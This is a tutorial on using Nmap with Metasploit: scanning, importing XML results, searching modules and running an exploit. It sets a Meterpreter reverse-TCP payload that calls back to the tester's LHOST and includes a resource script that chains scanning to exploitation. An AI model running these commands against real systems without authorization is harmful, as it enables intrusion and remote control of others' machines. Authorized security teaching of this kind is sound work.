Using Nmap with Metasploit

Learn how to use Nmap with Metasploit for penetration testing and vulnerability exploitation.

Introduction

Nmap (Network Mapper) and Metasploit are two of the most widely used tools in offensive security, relied on by penetration testers, red teamers and security engineers. Nmap is a host discovery and port scanner that also identifies service versions and, through its NSE scripts, can probe for some known vulnerabilities; Metasploit is an exploitation framework used to test whether a discovered weakness is actually exploitable. The two integrate through Metasploit's database: Nmap's XML output can be imported into it (or Nmap can be driven from msfconsole with db_nmap), so discovery, analysis and exploitation work from one shared record of hosts and services.

In this article, we will explore how to use Nmap with Metasploit effectively, covering installation, scanning, importing results, and leveraging discovered vulnerabilities for exploitation.

Prerequisites

Before we dive into using Nmap with Metasploit, ensure you have the following installed on your system:

  • Kali Linux (recommended) or another penetration testing distribution
  • Nmap (pre-installed in Kali Linux or install with sudo apt install nmap)
  • Metasploit Framework (MSF) (pre-installed in Kali Linux or install with sudo apt install metasploit-framework)

Step 1: Performing Network Scanning with Nmap

Before launching an attack, it is crucial to gather information about the target network. Nmap provides various scan types that help in this process.

Basic Nmap Scan

To perform a basic scan on a target IP address:

nmap <target-IP>

With no options Nmap performs host discovery and then scans the 1,000 most common TCP ports (a SYN scan when run as root, a TCP connect scan otherwise), reporting each as open, closed or filtered. The service names in this output come from Nmap's port-number table, not from the traffic; add -sV if you need the real product and version strings.

Aggressive Scan

For a more detailed scan, use the -A flag:

nmap -A <target-IP>

-A combines OS detection (-O), version detection (-sV), the default NSE script set (-sC) and traceroute. It is the noisiest and slowest of the common options, so on a large or sensitive scope prefer the narrower flags you actually need, for example -sV -sC.

Scanning Specific Ports

To scan specific ports, use the -p flag:

nmap -p 22,80,443 <target-IP>

This command scans only ports 22 (SSH), 80 (HTTP), and 443 (HTTPS).

Scanning a Range of IPs

For scanning a subnet or range of IPs:

nmap 192.168.1.0/24

This scans all devices within the 192.168.1.x network.

Saving Scan Results

To save scan results for further analysis:

nmap -oX scan_results.xml <target-IP>

-oX writes the results as XML, the format Metasploit's db_import reads. Include -sV in any scan you intend to export, because the product and version strings are what you will later search exploits against. -oA <basename> writes normal, grepable and XML output in one run if you also want a human-readable copy.

Step 2: Importing Nmap Scan Results into Metasploit

Once you have performed an Nmap scan, importing the results into Metasploit allows for further analysis and exploitation.

Starting Metasploit

Launch Metasploit by running:

msfconsole

Once inside the console, confirm that the database is connected, since every db_ command depends on it:

db_status

If it reports that no database is connected, exit, run sudo msfdb init (on Kali) and start msfconsole again. Then import the scan results:

db_import scan_results.xml

To verify that the results were imported, list the hosts now stored in the database:

hosts

This lists the imported hosts (address, hostname, OS guess and state). The open ports are shown by the services command, covered in the next step.

Step 3: Analyzing Imported Data

Metasploit provides built-in database commands to analyze imported Nmap data effectively.

Viewing Services

To list all discovered services on the scanned hosts:

services

This helps identify potential attack vectors based on running services.

Searching for Vulnerabilities

search matches module names and descriptions across every module type (exploits, auxiliary scanners, post modules), so narrow it with a type filter and use the product string from the services output:

search type:exploit <service-name>

For example, if Apache httpd is detected:

search type:exploit apache

Metasploit will list the exploit modules that match, with their disclosure date and rank. Read a candidate with info <module-path> before using it, and compare its listed target versions with the version Nmap reported; a name match alone says nothing about whether the host is vulnerable.

Step 4: Exploiting Discovered Vulnerabilities

Once you have identified a vulnerable service, the next step is to select and use an exploit.

Selecting an Exploit

Use the following command to choose an exploit:

use exploit/multi/http/apache_struts2_rce

The path above is a placeholder: replace it with a module path copied from the search output. After use, run show options to see which settings the module requires.

Setting Target and Payload

Specify the target IP:

set RHOSTS <target-IP>

Set the payload. It must match both the module and the target platform (a Windows payload will not run on a Linux target); show payloads lists the payloads compatible with the selected module:

set PAYLOAD windows/meterpreter/reverse_tcp

Set the listening host, the address on your attacking machine that the target can reach back to (and LPORT if the default 4444 is blocked on the way back):

set LHOST <your-IP>

Executing the Exploit

If the module implements a check method, run it first; it tests for the vulnerability without attempting exploitation:

check

Once everything is configured, run the exploit:

exploit

If successful, this opens a session (a Meterpreter session for the payload above). List sessions with sessions -l and interact with one using sessions -i <id>.

Automating Nmap and Metasploit with Resource Scripts

To streamline scanning and exploitation, you can create a resource script: a text file of msfconsole commands that are executed in order, exactly as if typed. Resource scripts do not branch on results, so anything that needs a human decision (which module to use, which payload fits) must be settled before the script is written.

Creating a Resource Script

Open a text editor and create a script, e.g., scan_exploit.rc:

spool output.log
db_nmap -A -p 22,80,443 <target-IP>
hosts
services
search type:exploit apache
use exploit/multi/http/apache_struts2_rce
set RHOSTS <target-IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-IP>
exploit -z
spool off

Save it and pass it to msfconsole at start-up:

msfconsole -r scan_exploit.rc

Inside a running console, resource scan_exploit.rc does the same. The commands run sequentially; with spool set, everything printed is also written to output.log for the report, and exploit -z opens the session without dropping into it so the remaining lines still execute. db_nmap needs the database connection just as db_import does, and the script will stop at the use line unless the placeholder module path has been replaced with a real one.
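As an added example, not code from this article, from Nmap or from Metasploit, the script below performs the glue work of Step 2 and of this section in Python: it parses the XML that nmap -oX writes into the same host/port/service rows the services command shows after db_import, then writes a resource script that imports the file and runs one search per product found. The XML document, host addresses and product strings are constructed for the example; the workspace name lab and the log file name are assumptions. Module selection is deliberately left out of the generated script, since a script cannot read the search output and should not guess a module path.

```python
"""Turn an `nmap -oX` file into the rows msfconsole's `services` table shows,
then emit a resource script that imports the XML and searches for exploit
modules per discovered product.  Example added to the article; it is not
part of Nmap or Metasploit."""
import xml.etree.ElementTree as ET

# Constructed sample in the format `nmap -sV -oX` writes (declaration and
# DOCTYPE omitted); hosts, ports and product strings are made up.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan_results.xml 192.168.1.0/24" version="7.94">
  <host><status state="up" reason="syn-ack"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <hostnames><hostname name="web01.lab" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.9p1" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.52" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="443"><state state="closed" reason="reset"/>
        <service name="https" method="table" conf="3"/></port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.168.1.20" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_services(xml_text):
    """Return one dict per open port with the fields the `services` command
    lists (host, port, proto, name, info).  Down hosts and non-open ports
    are skipped, as Metasploit's default services view skips them."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            addr = host.find("address")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            product = svc.get("product", "").strip() if svc is not None else ""
            version = svc.get("version", "").strip() if svc is not None else ""
            rows.append({
                "host": addr.get("addr"),
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": svc.get("name", "") if svc is not None else "",
                # `info` is the product/version string Nmap probed, the text
                # you feed to `search`; empty when only the port table matched.
                "info": " ".join(p for p in (product, version) if p),
            })
    return rows


def build_resource_script(xml_path, rows, workspace="lab", log="output.log"):
    """Emit msfconsole commands: spool to a log, switch to a workspace
    (assumed name), import the scan, list hosts and services, then one
    `search type:exploit <product>` per distinct product, and stop spooling."""
    lines = [f"spool {log}", f"workspace -a {workspace}",
             f"db_import {xml_path}", "hosts", "services"]
    seen = []
    for row in rows:
        # First word of the probed product ("Apache", "OpenSSH"); fall back
        # to the service name when Nmap could not identify the product.
        product = row["info"].split(" ")[0] if row["info"] else row["name"]
        if product and product not in seen:
            seen.append(product)
            lines.append(f"search type:exploit {product}")
    lines.append("spool off")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    rows = parse_services(SAMPLE_XML)
    for row in rows:
        print(f"{row['host']}\t{row['port']}/{row['proto']}\t{row['name']}\t{row['info']}")
    with open("scan_triage.rc", "w") as fh:
        fh.write(build_resource_script("scan_results.xml", rows))
```

Run it against a real file by swapping SAMPLE_XML for open("scan_results.xml").read(); the resulting scan_triage.rc is loaded with msfconsole -r scan_triage.rc, and the analyst picks the module, payload and LHOST from the logged search results before writing the exploitation script.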

Conclusion

Using Nmap with Metasploit is a core technique for penetration testers and ethical hackers. Nmap finds live hosts, open ports and service versions; Metasploit stores those findings and lets you test and exploit the candidate vulnerabilities against them. By integrating the two, you keep reconnaissance, analysis and exploitation in one database and avoid retyping targets between tools.

Mastering these tools will significantly enhance your penetration testing skills and improve your cybersecurity expertise. However, always ensure ethical and legal usage by obtaining proper authorization before performing security assessments.